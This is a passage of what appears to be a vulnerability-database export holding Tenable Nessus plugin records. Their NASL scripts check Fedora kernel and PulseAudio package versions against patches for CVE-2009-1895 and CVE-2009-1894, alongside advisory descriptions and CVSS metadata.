Fixes\nsecurity bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407 Adds\n-fno-delete- null-pointer-checks gcc compile flag to protect against\nissues similar to 
CVE-2009-1897.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.26\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?221cc2c4\"\n );\n # http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.27\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?97580674\"\n );\n # http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.28\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5b5c637f\"\n );\n # http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.29\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?38d2b377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511171\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=512861\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=512885\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/027436.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ee2323e4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(16, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"kernel-2.6.27.29-170.2.78.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:33", "description": "Fix security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407 Add -fno-delete-null-pointer-checks gcc compile flag to protect against issues similar to CVE-2009-1897. Fix virtio_blk driver bug (reported against Fedora 10.) iwl3945 wireless driver rfkill fixes. Fix DPMS on some nVidia adapters when using the nouveau driver.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-08-05T00:00:00", "type": "nessus", "title": "Fedora 11 : kernel-2.6.29.6-217.2.3.fc11 (2009-8144)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-8144.NASL", "href": "https://www.tenable.com/plugins/nessus/40481", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8144.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40481);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_bugtraq_id(35647, 35850, 35851);\n script_xref(name:\"FEDORA\", value:\"2009-8144\");\n\n script_name(english:\"Fedora 11 : kernel-2.6.29.6-217.2.3.fc11 (2009-8144)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407 Add -fno-\ndelete-null-pointer-checks gcc compile flag to protect against issues\nsimilar to CVE-2009-1897. Fix virtio_blk driver bug (reported against\nFedora 10.) iwl3945 wireless driver rfkill fixes. Fix DPMS on some\nnVidia adapters when using the nouveau driver.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511171\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=512861\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=512885\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/027493.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?24db4f82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(16, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"kernel-2.6.29.6-217.2.3.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:48", "description": "The remote host is affected by the vulnerability described in GLSA-200907-13 (PulseAudio: Local privilege escalation)\n\n Tavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself. 
The vulnerability has independently been reported to oCERT by Yorick Koster.\n Impact :\n\n A local user who has write access to any directory on the file system containing /usr/bin can exploit this vulnerability using a race condition to execute arbitrary code with root privileges.\n Workaround :\n\n Ensure that the file system holding /usr/bin does not contain directories that are writable for unprivileged users.", "cvss3": {}, "published": "2009-07-17T00:00:00", "type": "nessus", "title": "GLSA-200907-13 : PulseAudio: Local privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:pulseaudio", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200907-13.NASL", "href": "https://www.tenable.com/plugins/nessus/39848", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200907-13.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39848);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"GLSA\", value:\"200907-13\");\n\n script_name(english:\"GLSA-200907-13 : PulseAudio: Local privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200907-13\n(PulseAudio: Local privilege escalation)\n\n Tavis Ormandy and Julien Tinnes of the Google Security Team discovered\n that the pulseaudio binary is installed setuid root, and does not drop\n privileges before re-executing itself. 
The vulnerability has\n independently been reported to oCERT by Yorick Koster.\n \nImpact :\n\n A local user who has write access to any directory on the file system\n containing /usr/bin can exploit this vulnerability using a race\n condition to execute arbitrary code with root privileges.\n \nWorkaround :\n\n Ensure that the file system holding /usr/bin does not contain\n directories that are writable for unprivileged users.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200907-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PulseAudio users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/pulseaudio-0.9.9-r54'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-sound/pulseaudio\", unaffected:make_list(\"ge 0.9.9-r54\"), vulnerable:make_list(\"lt 0.9.9-r54\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PulseAudio\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:21", "description": "Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that PulseAudio did not safely re-execute itself. A local attacker could exploit this to gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-07-17T00:00:00", "type": "nessus", "title": "Ubuntu 8.04 LTS / 8.10 / 9.04 : pulseaudio vulnerability (USN-804-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0", "p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulse-dev", "p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0", "p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulse0", "p-cpe:/a:canonical:ubuntu_linux:libpulse0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore5", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore5-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore9", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore9-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils-dbg", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.10", 
"cpe:/o:canonical:ubuntu_linux:9.04"], "id": "UBUNTU_USN-804-1.NASL", "href": "https://www.tenable.com/plugins/nessus/39851", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-804-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39851);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"USN\", value:\"804-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 8.10 / 9.04 : pulseaudio vulnerability (USN-804-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that\nPulseAudio did not safely re-execute itself. A local attacker could\nexploit this to gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/804-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore9-dbg\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|8\\.10|9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 8.10 / 9.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-dev\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulsecore5\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulsecore5-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif 
(ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-dev\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse0\", 